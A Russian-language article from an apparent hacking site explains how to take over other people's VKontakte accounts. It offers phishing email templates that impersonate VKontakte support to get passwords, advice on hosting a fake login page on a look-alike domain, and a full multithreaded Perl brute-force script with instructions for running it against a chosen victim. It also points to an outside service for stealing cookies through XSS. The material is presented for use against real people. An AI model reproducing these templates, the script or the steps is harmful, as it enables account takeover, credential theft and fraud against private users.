V-zlom.ru » Статьи » Взлом контакта

Взлом контакта

В данный момент очень популярны, стали соц. сети. В этой статье мы рассмотрим одну из них vkontakte.ru.

Очень много людей просят взломать страницу, из своих личных побуждений.

Над такими проектами работают профессионалы, и найти баг уже в состоявшем проекте почти нереально, но всё же редко что то всплывает и поэтому новичку, который нечего не знает, взломать будет НЕРЕАЛЬНО в любом случаи, потому что там сидят далеко не тупые люди и ни кто вам бесплатно помогать, так что смиритесь.

 

Для тех, кто понимает, о чём я, продолжаем.

 

ID это как уник. код юзера, то есть, например серийный номер машины.

Узнать его вы можете, зайдя в вконтакт, например, так выгладит ваша главная страница профиля http://vkontakte.ru/id5185**6?31892

ID получится 5185**6, то есть, то, что начинается от id и то знака ?. Если нету знака ? то идёт до конца.

 

Некоторые способы взлома:

 

1) Email + СИ -> Пишем анонимное письмо, с указанием отправителя, к примеру "support@vkontakte.ru", "admin@vkontakte.ru", с текстом типа

"

Здравствуйте.

В связи с очень высоким количеством пользователей в нашей системе,

идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо,

вам необходимо на него ответить в такой форме:

 

EM: Ваш email в vkontakte.ru.

PA: Ваш пароль в vkontakte.ru.

Пример:

EM: pavel_durov@mail.ru

PA: 123456

 

Чтоб не было путаницы, в теме письма укажите тему "Обновление".

 

Приносим извинения за неудобства.

".

Или типа этого, импровизируйте.

2) Фейк (обман), просто покупаете домен (к примеру, vkontaktte.ru) максимально похожий на vkontakte.ru, например разница в одной букве, и на него сливаете готовый фейк, его возьмете от сюда. vkontakte.zip [4.27 Kb] (cкачиваний: 19107)

3) Email + фейк, Опять же пишем анонимное письмо, но на этот раз наша цель заманить пользователя на фейк, и чтоб он ввёл данные. Отправитель, к примеру "support@vkontakte.ru", "admin@vkontakte.ru", с текстом типа

"

Здравствуйте.

В связи с очень высоким количеством пользователей в нашей системе,

идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо.

В течение недели вам нужно зайти в систему vkontaktte.ru, и вы будите автоматически занесены, а список активных.

 

Приносим извинения за неудобства.

".

Или типа этого, импровизируйте.

4) Использовать брутфорсы, ищите в поисковиках, вот например брутфорс на PERL.

 

 

Vkontakte.Ru Brute [FinaL]

Брутфорс акков вконтакте.ру

Сам скрипт брута (Perl):

 

 

 

#!/usr/bin/perl

 

use IO::Socket;

use MD5;

use threads;

use threads::shared;

my @pass : shared;

 

######################################

# C!klodoL

# vkontakte.ru bruteforce with multi-threads

######################################

$dic = 'passl.txt'; #словарь паролей

$id = 111111; #id цели

$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40

$threads = 4; #количество потоков

######################################

 

open (pass, "<$dic");

 

Next:

@pass = pass();

 

for(0..$threads) {$trl[$_] = threads->create(&Brut, $_);}

for(@trl) { $_->join; }

 

sub Brut

{

 

while (@pass){

 

$pass = shift @pass;

 

$md5 = MD5->hexhash($pass);

$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPor t=>80);

print $sock "HEAD http://vkontakte.ru/ HTTP/1.0rn".

"Host: vkontakte.rurn".

"Accept: */*rn".

"Content-Type: application/x-www-form-urlencodedrn".

"User-Agent: Mozillorn".

"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5rn".

"Connection: closernrn";

$answ = <$sock>;

close $sock;

print "$pass $answ";

if ($answ =~ /302/){

open (good, '>>good.txt');

print good "$id:$pass:$md5n";

print "$id:$pass:$md5n";

close good;

exit;}

}

 

}

 

goto Next;

 

sub pass

{

my (@mas);

while (){

push @mas, $_;

last if (@mas == 400);

}

chomp @mas;

return @mas;

}

 

 

--------------------------------------------------------------------------------

 

 

 

Цитата:

 

--------------------------------------------------------------------------------

$dic = 'passl.txt'; #словарь паролей

$id = 111111; #id цели

$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40

$threads = 4; #количество потоков

--------------------------------------------------------------------------------

 

 

Как запустить скрипт:

 

Цитата:

 

--------------------------------------------------------------------------------

1. Качаем прогу ActivePerl 5.10.0.1001 или более раннюю версию.

2. потом копируем текст в текстовый файл из кода выше... меняем id и мыло жертвы на нужное ,сохраняем как brut.txt

3. переименовываем файл из brute.txt в brute.pl

4. туда где лежит этот файл, копируем файл со словарём, обзывая его passl.txt

5. запускаем файл, и радуемся...

6. создастся good.txt, где и будет ваш пасс.

 

 

Vkontakte bruteforce ©serber

vkontakte_bruteforce.rar

 

или

vkontakte.exe

 

Словари тут.

5) Искать уязвимости, тобишь активные XSS и SQl, для кражи кук используйте na-s.ru. Такие уязвимости очень дорого стоят, и выкладывать их нет смысла просить, тем более паблик уязвимости проживут сутки не более.

 

Ну, вот мы рассмотрели 5 способов как можно взломать страницу вконтакте.

 

Если до сих пор не поняли, не судьба :) Лучше мирно сидите там дальше вконтакте.

  • Автор: makar
  • Комментарии: 1
  • Просмотры: 14264
2

Добавить комментарий

Вы не авторизованы и вам запрещено писать комментарии. Для расширенных возможностей зарегистрируйтесь!
  • Написал: Muha007
  • Комментарии: 4
  • 5 сентября 2016 18:43
как писать анонимное письмо?